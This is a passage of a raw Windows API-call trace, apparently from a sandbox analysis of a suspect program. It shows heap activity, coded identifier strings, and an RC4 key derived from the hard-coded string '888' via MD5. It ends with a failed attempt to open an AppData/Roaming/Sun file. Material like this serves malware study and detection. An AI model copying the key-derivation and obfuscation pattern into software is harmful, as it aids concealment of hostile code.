returned 0x2aa9538 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0151.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.196] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0151.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0151.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0151.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.196] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0151.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0151.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0151.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0151.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0151.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0151.197] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Sun", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0x9e1e38 [0151.197] FindClose (in: hFindFile=0x9e1e38 | out: hFindFile=0x9e1e38) returned 1 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0151.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0151.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.199] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.199] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0151.199] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.199] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.200] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0151.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.201] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0151.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0151.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0151.201] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0151.219] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0151.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0151.219] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.219] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0151.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0151.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0151.220] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0151.220] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0151.220] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0151.220] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.220] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.220] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0151.220] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0151.221] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.221] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.221] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.221] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.221] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.221] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.221] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.221] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.221] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.221] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0151.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa4b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0151.221] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0151.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0151.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0151.221] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0151.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0151.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0151.221] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.222] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0151.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0151.222] CryptHashData (hHash=0x9e2078, pbData=0x2a72648, dwDataLen=0x3, dwFlags=0x1) returned 1 [0151.222] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.222] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.222] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.222] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0151.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa408, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0151.222] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1fb8) returned 1 [0151.222] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.222] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0151.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7040, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0151.222] CryptDestroyHash (hHash=0x9e2078) returned 1 [0151.223] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Sun" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.223] GetLastError () returned 0x5 [0151.223] 